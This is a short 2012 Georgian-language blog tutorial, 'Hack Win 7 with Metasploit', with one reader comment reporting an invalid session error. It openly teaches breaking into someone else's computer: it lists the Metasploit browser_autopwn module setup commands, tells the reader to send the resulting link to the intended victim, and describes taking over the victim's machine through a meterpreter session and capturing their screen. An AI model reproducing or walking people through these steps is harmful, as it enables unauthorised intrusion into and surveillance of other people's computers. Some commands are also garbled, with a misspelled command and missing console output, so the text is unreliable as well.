Thursday, December 13, 2012

Hack Win 7 with Metasploit



მოგესალმებით ყველას,დღეს აგიხსნით თუ როგორ უნდა შევძვრეთ სხვის კომპიუტერში მეტასპლოიტის დახმარებით მაშ ასე დავიწყოთ :



ნაბიჯი #1 : უნდა გადმოვწეროთ მეტასპლოიტი )) გადმოწერა
ნაბიჯი #2 : ვაინსტალირებთ
ნაბიჯი #3 : გავხსნათ მეტასპლოიტის კონსოლი და დავიწყოთ :))
კონსოლი გამოიყურება დაახლოებით ესე :

ნაბიჯი #4 :  კონსოლში ვწერ შემდეგ რამეს : use auxiliary/server/browser_autopwn
ნაბიჯი #5 : შემდეგ ვწერთ : set LHOST 192.168.1.1 <-- აქ უნდა ჩავწეროთ ჩვენი შიდა IP
ნაბიჯი #6 : შემდეგ ვწერთ : set LPORT 80 <-- porti დატოვეთ 80 ))
ნაბიჯი #7 : შემდეგ ვწერთ : set uripath /
ნაბიჯი #8 : და ბოლოს ვწერთ : exploit
ამის შემდეგ ბევრ რამეს დაწერს )) და დაველოდოთ ...

ბოლოს რომ გაჩერდება უნდა ეწეროს ესეთი რამ :




ამის შემდეგ იმას ვისი კომპიუტერის გატეხვაც გვინდა ვუგზავნით შემდეგ ლინკს :
http://192.168.1.107:8080 <--- ჩემ შემთხვევაში 192.168.1.107-ია შიდა IP თქვენ შემთხვევაში რაც იქნება ის უნდა გაუგზავნოთ მაგრამ გაითვალისწინეთ შიდა IP-ს ვიყენებთ მხოლოდ LAN -ში ხოლო თუ GLOBAL-ში გვინდა გარე IP უნდა ჩავწეროთ...
როდესაც მსხვერპლი ბრაუზერით შევა ჩვენს მიერ მიცემულ ლინკზე ჩვენი მეტასპლოიტი დაიწყებს ისევ რაღაცეების წერას და ბოლოს გაჩერდება და გვექნება ესეთი რამ : msf auxiliary(browser_autopwn) > და ეს როცა დაიწერება ამას უნდა მივუწეროთ ესეთი რამ : sessions -i 1.
თუ ყველაფერს ზუსტად შეასრულებთ და ყველაფერი გამოგივათ დაწერეს შემდეგ რაღაცას: meterpreter > ანუ უკვე მსხვერპლის კომპიუტერში იმყოფებით და მხოლოდ ერთი ბრძანებით შეგიძლიათ უკვე SCREEN-ი გამოაჩინოთ ეს ბრძანება არის : screenshoot

იმედია ყველაფერი გამოგივათ წარმატებებს გისურვებთ ;) პატივისცემით ./RoBBeR

1 comment:

  1. roca vwer sessions -i 1 ese miwers da risi bralia?

    msf auxiliary(browser_autopwn) > sessions -i 1
    [-] Invalid session id
    msf auxiliary(browser_autopwn) >

    ReplyDelete